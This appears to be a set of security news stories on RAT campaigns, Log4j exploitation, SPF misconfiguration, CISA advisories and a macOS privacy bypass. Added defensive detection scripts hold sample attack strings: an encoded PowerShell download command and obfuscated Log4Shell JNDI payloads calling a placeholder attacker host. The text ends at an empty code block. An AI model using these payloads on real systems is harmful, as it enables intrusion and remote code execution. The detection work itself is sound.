More stories

  • Remote Access Trojans spread through Microsoft Azure, AWS cloud service abuse

    A recent campaign leveraging public cloud infrastructure is deploying not one, but three commercial Remote Access Trojans (RATs).

    Nanocore, Netwire, and AsyncRAT payloads are being deployed from public cloud systems in what Cisco Talos suggests is a way for attackers to avoid owning or managing their own private, paid infrastructure, such as ‘bulletproof’ hosting, which may eventually attract the interest of law enforcement. The abuse lets cybercriminals draw on the resources of cloud services run by vendors including Microsoft Azure and Amazon Web Services (AWS) for malicious purposes.

    “These types of cloud services like Azure and AWS allow attackers to set up their infrastructure and connect to the internet with minimal time or monetary commitments,” Talos says. “It also makes it more difficult for defenders to track down the attackers’ operations.”

    On Wednesday, Cisco Talos researchers Chetan Raghuprasad and Vanja Svajcer said the campaign, which runs on public cloud infrastructure, was discovered in October 2021. Most victims are in the US, Canada, and Italy; a handful appear to be in Spain and South Korea.

    The attack chain begins in typical fashion, with a phishing email often disguised as an invoice. The messages carry a .ZIP attachment which, once opened, reveals an ISO image. The ISO contains a loader for the Trojans written as JavaScript, a Windows batch file, or a Visual Basic script.

    When the victim opens the disk image and runs the file inside it, the loader executes. Designed to deploy Nanocore, Netwire, and AsyncRAT, the scripts reach out to a download server to fetch a payload, and this is where the public cloud service comes into play.

    The downloader scripts are obfuscated to hide this activity. The JavaScript has four layers of obfuscation, with each new malicious process generated after the previous layer is peeled back; the batch file contains obfuscated commands that run PowerShell to fetch its payload, and the VBScript file likewise relies on PowerShell commands. A PowerShell dropper built with HCrypt was also detected.

    The attackers behind the campaign manage a variety of payload hosts, command-and-control (C2) servers, and malicious subdomains. Most of those detected so far are hosted on Azure and AWS.

    “Some of the download servers are running the Apache webserver application,” the researchers say. “The HTTP servers are configured to allow the listing of open directories that contain variants of NanocoreRATs, Netwire RAT, and AsyncRATs malware.”

    The operators also abuse DuckDNS, a legitimate dynamic DNS service that points subdomains at IP addresses. Malicious DuckDNS subdomains serve the malware downloads and mask the names of the C2 hosts, according to Talos.

    Netwire, Nanocore, and AsyncRAT are popular commercial Trojan strains widely used by threat actors to remotely access and hijack infected machines, steal user data, and conduct surveillance, including audio and camera capture.

    “Defenders should monitor traffic to their organization and implement robust rules around the script execution policies on their endpoints,” the researchers commented. “It is even more important for organizations to improve email security to detect and mitigate malicious email messages and break the infection chain as early as possible.”
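The chain Talos describes (user opens an ISO from a ZIP, a script host runs the loader from the mounted image, PowerShell fetches the payload, the download host sits behind a dynamic-DNS name) is something endpoint telemetry can score stage by stage. The following is an added example of that detection logic; it is not Talos code. The process-event record, the sample events, the encoded command blob and the heuristic that a script launched from a drive letter other than C: came from a mounted image are all constructed assumptions for illustration, not fields or indicators taken from the report.

```python
"""Score process-creation telemetry against the ISO -> script host -> PowerShell -> DuckDNS chain.

Added example, not Talos code. ProcEvent is a constructed, simplified record; real EDR
or Sysmon schemas differ in field names but carry the same information.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str            # process image name, e.g. "wscript.exe"
    cmdline: str          # full command line
    dest_host: str = ""   # outbound connection by this process, if any (constructed field)


USER_APPS = {"explorer.exe", "outlook.exe"}               # where a user opens the attachment
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "cmd.exe"}  # JS / VBS / batch loaders
POWERSHELL = {"powershell.exe", "pwsh.exe"}
DYNDNS = re.compile(r"\.duckdns\.org$", re.I)
# first script argument on the command line: drive letter + path + loader extension
SCRIPT_ARG = re.compile(r'"?([A-Za-z]:\\[^"\s]+\.(?:js|jse|vbs|vbe|bat|cmd))"?', re.I)
# download / decode primitives, or a long -EncodedCommand blob
PS_DOWNLOAD = re.compile(
    r"FromBase64String|DownloadString|DownloadFile|Invoke-WebRequest|\bIEX\b|"
    r"Invoke-Expression|-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{40,}", re.I)


def lineage(ev, by_pid):
    """Return [ev, parent, grandparent, ...] following ppid links (cycle-safe)."""
    chain, seen = [ev], {ev.pid}
    while chain[-1].ppid in by_pid and chain[-1].ppid not in seen:
        parent = by_pid[chain[-1].ppid]
        seen.add(parent.pid)
        chain.append(parent)
    return chain


def assess(ev, by_pid):
    """List the reasons one event matches a stage of the chain:
    user app -> script host run from a non-system volume (assumed: a mounted ISO)
    -> PowerShell with a download/decode primitive -> dynamic-DNS host."""
    images = [p.image.lower() for p in lineage(ev, by_pid)]
    reasons = []
    if images[0] in SCRIPT_HOSTS and any(i in USER_APPS for i in images[1:]):
        m = SCRIPT_ARG.search(ev.cmdline)
        if m and not m.group(1).upper().startswith("C:\\"):
            reasons.append(f"{images[0]} launched from non-system volume: {m.group(1)}")
    if images[0] in POWERSHELL:
        if any(i in SCRIPT_HOSTS for i in images[1:]):
            reasons.append("powershell spawned under a script host")
        if PS_DOWNLOAD.search(ev.cmdline):
            reasons.append("download/decode primitive in PowerShell command line")
    if ev.dest_host and DYNDNS.search(ev.dest_host):
        reasons.append(f"outbound to dynamic-DNS host {ev.dest_host}")
    return reasons


def detect(events):
    """Map pid -> reasons for every event that matches at least one stage."""
    by_pid = {e.pid: e for e in events}
    hits = {e.pid: assess(e, by_pid) for e in events}
    return {pid: r for pid, r in hits.items() if r}


# Constructed sample: one infection chain plus one benign admin script.
ENC = "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA"
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "explorer.exe", "C:\\Windows\\explorer.exe"),
    ProcEvent(200, 100, "wscript.exe", r'wscript.exe "E:\invoice_4471.js"'),
    ProcEvent(300, 200, "powershell.exe", f"powershell.exe -nop -w hidden -enc {ENC}",
              "invoice-update.duckdns.org"),
    ProcEvent(400, 1, "outlook.exe", "C:\\Program Files\\Microsoft Office\\OUTLOOK.EXE"),
    ProcEvent(500, 400, "powershell.exe", r"powershell.exe -File C:\scripts\backup.ps1"),
]

if __name__ == "__main__":
    for pid, reasons in detect(SAMPLE_EVENTS).items():
        print(pid, "->", "; ".join(reasons))
```

Each stage alone is noisy (administrators run PowerShell from cmd.exe all day), which is why the scoring walks the parent chain and reports every matching stage rather than alerting on a single one; the benign backup script in the sample produces no reasons at all, while the loader's PowerShell child collects three.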

  • Log4j: How hackers are using the flaw to deliver this new 'modular' backdoor

    Iran-backed hacking group Phosphorus, also tracked as APT35, is using the Log4j vulnerability to distribute a new modular PowerShell toolkit, according to security firm Check Point. APT35 is one of several state-backed groups known to have been developing tools to exploit public-facing Java applications that use vulnerable versions of the Log4j logging library.


    Microsoft, which tracks the group as Phosphorus and has called it out for increasingly using ransomware in attacks, found it had operationalized a Log4j exploit for future campaigns less than a week after Log4Shell’s December 9 disclosure.

    According to further analysis by Check Point, APT35’s Log4j work was sloppy and “obviously rushed”, using a basic, publicly available JNDI exploit kit (since removed from GitHub) for attacks that were easy to detect and attribute.

    After exploiting Log4j on public-facing systems, the group uses what Check Point describes as ‘a PowerShell-based modular backdoor’ for persistence, communication with a command and control (C&C) server, and execution of additional modules. The main module of the PowerShell framework validates network connectivity, enumerates characteristics of the compromised system, retrieves the C&C domain from a hardcoded URL, and fetches, decrypts and executes subsequent modules. After receiving information about the compromised system, the C&C server either issues no command or instructs the main module to execute other modules, written as PowerShell scripts or C# code.

    Communication between target and C&C runs continuously to determine which modules should be sent to the target next, according to Check Point. The additional modules are responsible for encrypting data, exfiltration via the web or an FTP server, and sending execution logs to a remote server, and each has its own capability: one lists installed applications, another takes screenshots, and others list running processes, perform enumeration, and execute predefined commands from the C&C. A final “cleanup module” is dropped at the end of collection activity to remove evidence, such as running processes created by previously used modules.

    “The modules sent by the C&C are executed by the main module, with each one reporting data back to the server separately,” explains Check Point. “This C&C cycle continues indefinitely, which allows the threat actors to gather data on the infected machine, run arbitrary commands and possibly escalate their actions by performing a lateral movement or executing follow-up malware such as ransomware.”

    On the quality of the group’s work, Check Point had few compliments: unlike most advanced persistent threats, the group does not bother changing tools and infrastructure between attacks and is known for operational security (OpSec) blunders.

    “The group is famous in the cybersecurity community for the number of OpSec mistakes in their previous operations, and they tend not to put too much effort into changing their infrastructure once exposed,” Check Point notes. The firm says the PowerShell scripts used in the Log4Shell attacks share coding styles with the ones the group used in Android spyware detailed by Google’s Threat Analysis Group in October.
    Despite confirmation from the US Cybersecurity and Infrastructure Security Agency (CISA) that it had seen no major breaches arise from Log4j exploitation, Microsoft assesses Log4Shell as a “high-risk” situation because it is difficult for organizations to know which applications, devices and services are affected. CISA also warned that attackers who have exploited Log4j may be waiting for alert levels to drop before using new but undetected footholds in targets.
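The “basic publicly available JNDI exploit kit” mentioned above works by getting a ${jndi:...} lookup into a string that the vulnerable application logs, and the kits typically wrap it in Log4j’s own nesting tricks (${lower:j}, ${::-j}, ${env:X:-j}) so that a grep for the literal “${jndi:” misses it. The following is an added example, not Check Point’s tooling and not anything from the kit: a normaliser that resolves those nested lookup forms the way Log4j does (innermost first) and only then checks for the JNDI lookup. The access-log lines are constructed and attacker.example is a placeholder host.

```python
"""Resolve Log4j lookup obfuscation in request logs, then flag JNDI lookups.

Added example, not Check Point's code. Log4j expands nested ${...} innermost-first,
so a scanner has to do the same before matching. Log lines below are constructed.
"""
import re

INNER = re.compile(r"\$\{([^${}]*)\}")   # a ${...} with nothing nested inside it
JNDI = re.compile(r"\$\{jndi:", re.I)
MAX_ROUNDS = 50                           # bound the rewrite loop on adversarial input


def _resolve(body: str) -> str:
    """Rewrite one innermost lookup body the way Log4j would, as far as attackers rely on it."""
    if ":-" in body:                      # ${x:-default}: undefined lookup -> its default
        return body.split(":-", 1)[1]     # covers ${::-j}, ${env:X:-j}, ${sys:X:-j}
    prefix, sep, arg = body.partition(":")
    if sep:
        p = prefix.lower()
        if p == "lower":
            return arg.lower()
        if p == "upper":
            return arg.upper()
    # jndi (terminal) and unknown lookups are kept; the markers stop INNER re-matching them
    return "\x00" + body + "\x01"


def normalize(text: str) -> str:
    """Expand nested lookups until nothing changes, then restore the kept ${...} tokens."""
    for _ in range(MAX_ROUNDS):
        rewritten = INNER.sub(lambda m: _resolve(m.group(1)), text)
        if rewritten == text:
            break
        text = rewritten
    return text.replace("\x00", "${").replace("\x01", "}")


def is_jndi_probe(text: str) -> bool:
    return bool(JNDI.search(normalize(text)))


def scan_log(lines):
    """Return (line number, normalised line) for every line carrying a JNDI lookup."""
    return [(n, normalize(line)) for n, line in enumerate(lines, 1) if is_jndi_probe(line)]


# Constructed access-log lines (client, request, status, referer, user-agent).
SAMPLE_LOG = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.6 - - "GET / HTTP/1.1" 200 "-" "${${lower:j}ndi:${lower:LDAP}://attacker.example/a}"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/b}"',
    '10.0.0.8 - - "GET /?q=${${env:NaN:-j}ndi:dns://attacker.example/c} HTTP/1.1" 404 "-" "Mozilla/5.0"',
    '10.0.0.9 - - "GET /index.html HTTP/1.1" 200 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '10.0.0.10 - - "GET /?tpl=${date:yyyy} HTTP/1.1" 200 "-" "curl/7.81.0"',
]

if __name__ == "__main__":
    for n, line in scan_log(SAMPLE_LOG):
        print(n, line)
```

The normalised form is what you want to record in the alert, because it names the protocol and host the payload would have contacted; the raw line is often unreadable. Unknown lookups such as ${date:...} are left intact rather than flagged, which keeps the check from firing on ordinary template syntax.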

  • Check your SPF records: Wide IP ranges undo email security and make for tasty phishes

    You’ve done the right thing by your organisation and made sure that DMARC and SPF (Sender Policy Framework) records are set to reduce email spoofing, but all that good work can be undone if the SPF record authorises too wide an IP range.

    Such a situation was pointed out by Can I Phish CEO Sebastian Salla, who scanned 1.8 million Australian domain records in search of email security snafus. The mistake Salla was looking for was within SPF records, which can authorise individual IP addresses but also whole IP ranges. If an organisation had entered a wide range and its email infrastructure sat with a cloud provider, where public IP addresses are recycled between customers unless an organisation pays to keep a dedicated address, there was scope for someone else to obtain an address covered by that organisation’s SPF record.

    Having found 60,000 authorised IPs pointing at various regions within Amazon Web Services (AWS), Salla started EC2 instances on AWS and was handed IP addresses that another organisation had declared it controlled. This happened 264 times. Among those caught out were Australian Parliament House, the University of Sydney, Mirvac, another major property investment group, and a state government organisation.

    “Each of the affected 264 organisations and their downstream customers are significantly more susceptible to business email compromise and phishing-related attacks. Anyone with a credit card can sign-up for an AWS account, cycle through EC2 instances until they get a desirable IP, request AWS to remove any SMTP restrictions and begin sending SPF authenticated emails as though they are any of these organisations,” Salla wrote. “When we consider the position that some of these organisations are in, we can better understand the impact. Imagine a parliamentary staffer receiving an email that appears to come from a Minister, or a student receiving an email posing as someone from university admissions and so on… The recipients in these cases have no technical mechanism to determine the real from fake.”

    Salla told ZDNet that 69 of the organisations he found have yet to fix the issue, despite being given a 30-day remediation window and his working with the Australian Cyber Security Centre (ACSC) on disclosure. While small organisations might have used wide IP ranges because of dynamic address allocation, Salla said large organisations have other considerations even though they can afford to reserve address blocks.

    “Due to the way AWS pricing works, if you reserve an IP address and then don’t use it, you get penalised and incur an hourly cost (this is due to the nature of there being limited IPs and AWS not wanting customers to reserve IPs excessively),” he said. “So I suspect, a business unit that focuses on cost optimisation in each org, is likely releasing unused IPs which mean people such as myself can come in and take them — ultimately leading to IP takeover attacks if this activity hasn’t been communicated between business units.

    “The ultimate fix is to only list IP addresses that are being actively used by mail servers — in the event that redundancy/disaster recovery are necessary, there are in-built capabilities within AWS that enable this, such as use of load-balancers or NAT gateways that only use a single IP.”

    In response to ZDNet, the ACSC pointed to the Australian government Information Security Manual as well as its advice on email security.

    “Organisations can reduce the likelihood of their domains being used to support fake emails by implementing Sender Policy Framework and Domain-based Message Authentication, Reporting and Conformance (DMARC) records in their Domain Name System configuration,” an ACSC spokesperson said. “DMARC is one of a variety of controls that, when used together, is a highly effective countermeasure for preventing phishing attacks where the attacker attempts to fully impersonate the sending email domain.
    “It is ultimately up to each agency to implement the advice of the Australian Cyber Security Centre, based on that agency’s assessment of the cyber threats it faces.”

    For its part, the Department of Parliamentary Services said it had fixed the issue. “The Department of Parliamentary Services resolved the issue of an incorrect SPF configuration for the vendor and this had no impact on the network,” it said.

    The University of Sydney, as is typical, said it took security seriously but would not comment on details of its cyber posture. “We do continually review and improve our systems to manage such threats, and can confirm the matters raised in the blog are not a current issue,” a spokesperson said.

    At the start of last month, Salla found a number of sites created by local web development company Precedence, whose customers include a Queensland council and a federal member of parliament, that used a /16 address range (65,536 addresses) in the SPF record shared across its client base. Salla said the range was such that almost any EC2 instance started in AWS’s Sydney (ap-southeast-2) region would receive an address covered by it.

    “The first EC2 instance I spun up had an authorised IP address and I was able to send myself an SPF authenticated email from this particular city council which went straight into my inbox — passing all SPF and DMARC checks,” Salla wrote.
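The check Salla ran at scale comes down to two questions per domain: how many addresses does each ip4 mechanism in the SPF record actually authorise, and would a random address from the same cloud region pass? The following is an added example that answers both offline; it is not Can I Phish’s scanner. The two records, the hypothetical council domain, the /16 and /32 ranges (203.0.x.x is used purely as an illustrative range) and the “recycled instance IP” are constructed. include:, a: and mx: mechanisms are reported but not resolved, since that would need DNS; ip4 mechanisms are the ones at issue here.

```python
"""Audit an SPF record for over-wide ip4 ranges and test whether a sender IP would pass.

Added example, not Can I Phish code. Records and addresses below are constructed;
include/a/mx mechanisms are listed as unresolved because this runs without DNS.
"""
import ipaddress

QUALIFIERS = "+-~?"


def parse_spf(record: str):
    """Split a TXT record into (qualifier, mechanism_or_modifier, value) terms."""
    tokens = record.split()
    if not tokens or tokens[0].lower() != "v=spf1":
        raise ValueError("not an SPF record")
    terms = []
    for tok in tokens[1:]:
        qual = "+"
        if tok[0] in QUALIFIERS:
            qual, tok = tok[0], tok[1:]
        if "=" in tok.split(":", 1)[0]:          # modifier such as redirect= or exp=
            name, _, value = tok.partition("=")
            terms.append((qual, name.lower() + "=", value))
        else:
            name, _, value = tok.partition(":")
            terms.append((qual, name.lower(), value))
    return terms


def authorised_ip4(record: str):
    """Networks a '+ip4' mechanism authorises to send for the domain."""
    return [ipaddress.ip_network(v, strict=False)
            for q, name, v in parse_spf(record) if q == "+" and name == "ip4"]


def unresolved(record: str):
    """Mechanisms whose scope this offline check cannot evaluate."""
    return [f"{name}:{v}" if v else name
            for _, name, v in parse_spf(record) if name in ("include", "a", "mx", "redirect=")]


def audit(record: str, max_hosts: int = 256):
    """Return [(network, address count)] for ip4 ranges wider than max_hosts.
    A mail fleet rarely needs more than a /24; anything wider on shared cloud
    address space is the condition described in the article."""
    return [(str(n), n.num_addresses) for n in authorised_ip4(record)
            if n.num_addresses > max_hosts]


def spf_ip4_pass(record: str, sender_ip: str) -> bool:
    """Would a receiver's SPF check pass this sender on ip4 mechanisms alone?"""
    ip = ipaddress.ip_address(sender_ip)
    return any(ip in net for net in authorised_ip4(record))


# Constructed records for a hypothetical council domain: the over-wide one and the fix.
WIDE_RECORD = "v=spf1 ip4:203.0.0.0/16 include:spf.protection.outlook.com -all"
NARROW_RECORD = "v=spf1 ip4:203.0.113.25 include:spf.protection.outlook.com -all"
# A constructed address a freshly launched instance in the same region might be handed.
RECYCLED_INSTANCE_IP = "203.0.57.11"

if __name__ == "__main__":
    for label, rec in (("wide", WIDE_RECORD), ("narrow", NARROW_RECORD)):
        print(label, "over-wide:", audit(rec), "unresolved:", unresolved(rec))
        print(label, "passes recycled instance IP:", spf_ip4_pass(rec, RECYCLED_INSTANCE_IP))
```

With the wide record the recycled instance address passes SPF, exactly the situation Salla demonstrated; with the record narrowed to the single address the mail server actually uses, it fails. In a real audit you would also resolve the include: chains, since a permissive included record has the same effect.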

  • CISA: Russian state-sponsored groups exploited vulnerabilities in Microsoft, Cisco, Oracle tools

    The Cybersecurity and Infrastructure Security Agency (CISA) released an alert on Tuesday detailing a variety of tactics used by Russian state-sponsored groups to attack local and tribal governments across the US between September 2020 and December 2020. When pressed on why the guide was being released now and which local governments were attacked in 2020, CISA said it was part of their “continuing cybersecurity mission” with “interagency partners to warn organizations of potential criminal or nation state cyber threats.” 


    “As described in the advisory, Russian state-sponsored actors have targeted a variety of US and international critical infrastructure organizations over the years. This guidance is being released to broadly share known tactics, techniques, and procedures, and encourage network defenders to take recommended actions,” a CISA spokesperson said.

    The alert said Russian state-sponsored advanced persistent threat (APT) actors have generally targeted US and international critical infrastructure organizations, but that the “high-profile cyber activity” revolved around attacks on state, local, tribal, and territorial (SLTT) governments and aviation networks in the fall of 2020. CISA said the groups “targeted dozens of SLTT government and aviation networks” and successfully compromised networks before exfiltrating data from an unknown number of victims.

    CISA also said APT groups conducted “multi-stage intrusion” campaigns against multiple companies in the energy sector between 2011 and 2018, deploying ICS-focused malware and collecting enterprise and ICS-related data.
    The notice includes a range of advice for organizations as they try to protect themselves and their systems. CISA, the FBI, and the NSA also released a full list of vulnerabilities that Russian state-sponsored groups typically use to gain initial access to target networks.

    Rick Holland, CISO at Digital Shadows, said these groups use “common but effective tactics,” relying on low-hanging fruit as well as sophisticated capabilities. “While it isn’t sexy, effective security hygiene like patching known vulnerabilities on external services raises the advisory costs and makes their job harder. Don’t be a soft target,” Holland said, noting the recent geopolitical tensions in the US-Russia relationship.

    The US is still recovering from the SolarWinds supply-chain compromise, which saw Russian government groups gain widespread access to 100 government contractors and multiple agencies including the State Department, Department of Homeland Security, National Institutes of Health, the Pentagon, the Treasury Department, the Department of Commerce, the Department of Energy and the National Nuclear Security Administration.

    Rep. Carolyn Maloney, chairwoman of the House Committee on Oversight and Reform, held a hearing on Tuesday about efforts to strengthen the Federal Information Security Management Act (FISMA), which would require federal agencies to improve their cybersecurity standards. Maloney noted that FISMA has not been updated since 2014 and that federal agencies reported 30,819 cybersecurity incidents in 2020 alone.

    The CISA release also comes as the US and Russia spar over Ukraine and Kazakhstan. The alert cites previously reported attacks by Russian groups on critical infrastructure in Ukraine. A US Homeland Security report from 2016 said 225,000 customers were left without power two days before Christmas 2015 because of the Russian attack on three regional electricity distribution companies. CISA explained on Tuesday that the groups involved used the BlackEnergy malware to steal user credentials, then used its KillDisk component to render infected computers inoperable.
    “In 2016, these actors conducted a cyber-intrusion campaign against a Ukrainian electrical transmission company and deployed CrashOverride malware specifically designed to attack power grids,” the CISA alert said.

    Chris Krebs, the former director of CISA, tweeted about the alert, saying, “State and NSC are in Geneva right now trying to keep the Russians out of Ukraine, but in case that doesn’t work, you might want to prepare for badness…”

  • Microsoft January 2022 Patch Tuesday: Six zero-days, over 90 vulnerabilities fixed

    Microsoft has released 96 security fixes, including updates that address six zero-day vulnerabilities. In the Redmond giant’s latest round of patches, usually released on the second Tuesday of each month in what is known as Patch Tuesday, Microsoft has fixed problems including remote code execution (RCE) flaws, privilege escalation flaws, spoofing issues, and cross-site scripting (XSS) vulnerabilities.

    Products impacted by the January 2022 security update include Microsoft Exchange Server, the Office software line, Windows Defender, the Windows kernel, RDP, Cryptographic Services, Windows Certificate handling, and Microsoft Teams.

    The zero-day vulnerabilities resolved in this update are:

    • CVE-2021-22947 (CVE assigned by HackerOne): a flaw in the open source curl library, rated as RCE by Microsoft, that is exploitable from a man-in-the-middle (MiTM) position.
    • CVE-2021-36976 (CVE assigned by MITRE): an open source libarchive use-after-free bug leading to RCE.
    • CVE-2022-21874: a local Windows Security Center API RCE vulnerability (CVSS 7.8).
    • CVE-2022-21919: a Windows User Profile Service elevation-of-privilege issue (CVSS 7.0); proof-of-concept exploit code is publicly available.
    • CVE-2022-21839: a Windows Event Tracing discretionary access control list denial-of-service (DoS) (CVSS 6.1).
    • CVE-2022-21836: Windows Certificate spoofing (CVSS 7.8); proof-of-concept code is publicly available.

    None of the zero-day flaws above is known to have been exploited in the wild.

    A total of 24 vulnerabilities were patched earlier this month in Microsoft Edge (Chromium-based). According to the Zero Day Initiative (ZDI), this volume is unusual for January, when the count in previous years was often roughly half this number. Microsoft has also announced a refreshed Security Update Guide notification system, with standard email addresses now accepted at signup rather than only Live IDs.

    Last month, Microsoft published 67 security fixes in the December 2021 Patch Tuesday. Seven critical vulnerabilities were among the issues patched, alongside six zero-day flaws. One of the zero-days tackled was CVE-2021-43890, a bug in the Windows AppX Installer that was being actively exploited in the wild to spread Emotet, Trickbot, and Bazaloader malware.

    A month prior, the tech giant tackled 55 vulnerabilities in the November 2021 Patch Tuesday. In other recent Microsoft news, earlier this month the company published an emergency fix for a bug affecting on-premises Exchange servers: a date-check failure prevented mail from moving through the transport queues of Exchange Server 2016 and Exchange Server 2019. Alongside Microsoft’s Patch Tuesday round, other vendors also publish security updates.

  • CISA adds 15 exploited vulnerabilities from Google, IBM, Microsoft, Oracle and more to catalog

    This week, the Cybersecurity and Infrastructure Security Agency (CISA) added 15 vulnerabilities to its Known Exploited Vulnerabilities Catalog. Three of the vulnerabilities need to be remediated by federal civilian agencies before January 24, while the rest have remediation dates of July 10. 


    CISA said the list is “based on evidence that threat actors are actively exploiting the vulnerabilities” and noted that the vulnerabilities are “a frequent attack vector for malicious cyber actors of all types and pose significant risk to the federal enterprise.”

    The most urgent additions are a VMware vCenter Server improper access control vulnerability, a Hikvision improper input validation vulnerability and a FatPipe WARP, IPVPN, and MPVPN privilege escalation vulnerability. The rest of the list covers vulnerabilities in Google Chrome, Microsoft Win32K, Microsoft WinVerifyTrust, Elastic Kibana, PrimeTek Primefaces, IBM WebSphere Application Server, the Exim mail transfer agent, Palo Alto Networks PAN-OS, Fortinet FortiOS and FortiProxy, Synacor Zimbra and Oracle WebLogic Server.

    The Known Exploited Vulnerabilities Catalog was created last year under a binding operational directive (BOD 22-01) that lets CISA require federal civilian agencies to remediate specific vulnerabilities that attackers are using. The first version of the list included 306 vulnerabilities commonly exploited in attacks and has grown since.

    Joshua Aagard, a vulnerability analyst on the Photon Research Team at Digital Shadows, told ZDNet that CISA’s additions are wide-ranging and likely to have knock-on effects for infrastructure. “Unauthorized actions and remote execution are cited many times as the consequence of successful exploitation. So are data input via sanitization and proper logical handling,” Aagard said.

    “Those I inspected also tend to share a common theme of centralized command or encompass a single point of failure. From an attacker’s perspective, a server console or critical proxy can serve as a Jenga block that brings down all the rest of the accompanying infrastructure.”

    The three that stood out most to him were the VMware vCenter Server, Hikvision and FatPipe vulnerabilities. Aagard explained that the vulnerability in Hikvision CCTV cameras and camera systems stems from a lack of input validation, which leaves the devices open to command injection, otherwise known as RCE. “Full control of the target device can be had via nonrestricted shell at the root level, which even supersedes the designated owner level,” Aagard said.

    The FatPipe Networks vulnerability affects its WARP, IPVPN, and MPVPN products and gives attackers access to an unrestricted file upload function on the servlet at the URL path /fpui/uploadConfigServlet, which can then be used to drop a web shell at /fpui/img/1,jsp for root access and subsequent elevated privileges, according to Aagard. “Successful exploitation of this vulnerability could lead to pivot access with the internal network. Software versions prior to releases 10.1.2r60p93 and 10.2.2r44p1 are affected by this issue,” Aagard said.

    For the VMware vulnerability, a malicious actor with network access to port 443 on vCenter Server could exploit the issue to bypass access controls and reach internal endpoints, Aagard explained. Netenrich principal threat hunter John Bambenek echoed Aagard’s concern about the VMware vulnerability, noting that vCenter servers aren’t just one asset but typically control many of the important assets in an organization.
    “This vulnerability provides a straightforward path to taking over a vCenter instance and all the assets therein,” Bambenek said. “Another observation is some of these vulnerabilities are quite old (one is from 2013). Why the federal government needs six more months to patch an 8-year-old vulnerability tells me all I need to know about how broken IT security is with the government.”

  • DDoS attacks that come combined with extortion demands are on the rise

    There has been a significant rise in distributed denial-of-service (DDoS) attacks accompanied by threats of extortion, with criminals demanding ransom payments in exchange for calling off an attack.

    DDoS attacks cause problems when attackers flood servers and online infrastructure with requests, slowing services down or taking them fully offline, so that legitimate users cannot reach them and the affected organisation loses business. While not an especially advanced form of cyber attack, DDoS attacks remain effective, and cybersecurity researchers at Cloudflare have warned that some of the cyber criminals behind DDoS campaigns are becoming more prolific and more aggressive.

    This includes a large rise in the number of ransom DDoS attacks, in which cyber criminals demand payment to stop a DDoS attack or not to launch one in the first place. According to Cloudflare, ransom DDoS attacks increased by almost a third year-on-year between 2020 and 2021 and jumped by 175% in the final quarter of 2021 compared with the previous three months. This included large-scale ransom DDoS attacks on voice over IP (VoIP) service providers.

    According to a survey by Cloudflare, just over one in five DDoS attacks during 2021 was accompanied by a ransom note from the attacker. In December, a prime time for online retailers in the run-up to Christmas, one in three of the organisations surveyed said they had received a ransom letter relating to a DDoS attack.

    Targets on the receiving end of DDoS attacks commonly include online retailers, online local government services, cloud-based business applications, streaming services and online games.

    “Over the years, it has become increasingly easier for attackers to launch DDoS attacks,” the researchers warned in the blog post.

    There are a number of steps organisations can take to avoid disruption from DDoS attacks, including using cloud-based hosting providers, load-testing their own infrastructure to learn its bandwidth limits, and employing a DDoS mitigation service.

  • Microsoft: This macOS bug could bypass controls and access private user data

    Microsoft has detailed how malware on macOS can bypass the privacy preferences enforced by Apple’s Transparency, Consent, and Control (TCC) system, which controls apps’ access to sensitive user data. The ‘powerdir’ bug, which Apple fixed in its December 13 update (macOS Monterey 12.1; the flaw is tracked as CVE-2021-30970), lets an attacker bypass TCC and gain access to a user’s protected data.

    The bug was discovered by Microsoft security researcher Jonathan Bar Or. Microsoft is interested in macOS security because Defender for Endpoint can be used in an enterprise to protect non-Windows devices.

    The Microsoft 365 Defender Research Team noted in a blog post that Apple introduced a feature to protect TCC that “prevents unauthorized code execution and enforced a policy that restricts access to TCC to only apps with full disk access.” However, Bar Or discovered that it is “possible to programmatically change a target user’s home directory and plant a fake TCC database, which stores the consent history of app requests.”

    “If exploited on unpatched systems, this vulnerability could allow a malicious actor to potentially orchestrate an attack based on the user’s protected personal data,” Microsoft said. An attacker could hijack an already installed app, or install their own malicious app, to access the microphone to record private conversations or capture screenshots of sensitive information displayed on the user’s screen, Microsoft explained.

    TCC appeared in 2012 in OS X Mountain Lion and is behind the system prompts users see when granting or denying ‘consent’ for specific applications to access private data, including the device’s camera, microphone and location, and the user’s calendar or iCloud account. Apple doesn’t describe TCC by name in its Platform Security guide; as security firm SentinelOne has pointed out, its purpose is covered in the section explaining how macOS and iOS protect app access to user data. Users manage these privacy protections in macOS in the Security & Privacy pane of System Preferences.

    “Apple devices help prevent apps from accessing a user’s personal information without permission using various technologies including Data Vault. In Settings in iOS and iPadOS, or System Preferences in macOS, users can see which apps they have permitted to access certain information as well as grant or revoke any future access,” Apple explains.

    Microsoft’s TCC bypass is a new way around the protections Apple added after previously discovered TCC bypasses, including CVE-2020-9771, CVE-2020-9934, and CVE-2021-30713. To protect TCC from those flaws, Apple introduced a feature that prevents unauthorized code execution and enforced a policy that restricts access to TCC to only apps with full disk access. Those fixes protected TCC.db (database) files from being accessed improperly through, for example, Time Machine backups or alternative file paths.

    Microsoft’s bypass of Apple’s TCC protections worked by planting a fake TCC.db file and changing the user’s home directory with the Directory Services command-line utility (dscl) run as root. “While requiring root access, we discovered that this works only if the app is granted with the TCC policy kTCCServiceSystemPolicySysAdminFiles, which the local or user-specific TCC.db maintains,” explains Microsoft.
    “That is weaker than having full disk access, but we managed to bypass that restriction with the dsexport and dsimport utilities.”

    Microsoft’s proof of concept demonstrated that attackers could change the settings of any application, potentially enabling microphone and camera access for any app, hence the bug’s name, “powerdir”.
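Because the bypass depends on redirecting a user’s home directory so that TCC reads a planted per-user database, a responder checking a Mac for it has two concrete things to look at: where each account’s NFSHomeDirectory points, and what the TCC.db found there actually grants. The following is an added example of both checks; it is not Microsoft’s proof of concept. The dscl output is a constructed sample in the format of `dscl . -list /Users NFSHomeDirectory`, the in-memory database uses only a simplified subset of the real `access` table’s columns, and the interpretation of auth_value 2 as “allowed” and the list of home-directory roots treated as normal are assumptions stated in the code.

```python
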